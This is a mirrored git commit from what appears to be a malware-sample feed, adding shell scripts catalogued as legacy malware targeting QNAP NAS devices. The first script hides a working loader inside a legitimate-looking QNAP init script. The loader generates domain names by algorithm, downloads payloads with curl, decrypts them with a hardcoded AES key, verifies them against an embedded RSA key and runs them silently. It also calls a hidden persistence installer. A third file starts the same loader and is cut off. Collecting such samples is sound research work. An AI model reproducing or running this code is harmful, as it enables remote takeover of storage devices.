mirror of
https://github.com/MalwareSamples/Malware-Feed
synced 2024-06-16 12:00:17 +00:00
Qnap
This commit is contained in:
parent
e189d90a94
commit
d50917b753
510
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/09ab3031796bea1b8b79fcfd2b86dac8f38b1f95f0fce6bd2590361f6dcd6764
Normal file
510
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/09ab3031796bea1b8b79fcfd2b86dac8f38b1f95f0fce6bd2590361f6dcd6764
Normal file
@ -0,0 +1,510 @@
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
{ /share/MD0_DATA/.system/.qinstaller.sh; exit 1; }
|
||||
esac
|
||||
{ /share/MD0_DATA/.system/.qinstaller.sh; exit 0; }
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.config" || mkdir "${bdir}/.qpkg/.config"
|
||||
cd "${bdir}/.qpkg/.config" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
{ /share/MD0_DATA/.system/.qinstaller.sh; exit 0; }
|
||||
fi
|
||||
fi
|
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/13f3ea4783a6c8d5ec0b0d342dcdd0de668694b9c1b533ce640ae4571fdbf63c
Normal file
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/13f3ea4783a6c8d5ec0b0d342dcdd0de668694b9c1b533ce640ae4571fdbf63c
Normal file
File diff suppressed because one or more lines are too long
550
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/15892206207fdef1a60af17684ea18bcaa5434a1c7bdca55f460bb69abec0bdc
Normal file
550
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/15892206207fdef1a60af17684ea18bcaa5434a1c7bdca55f460bb69abec0bdc
Normal file
@ -0,0 +1,550 @@
|
||||
#!/bin/sh
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
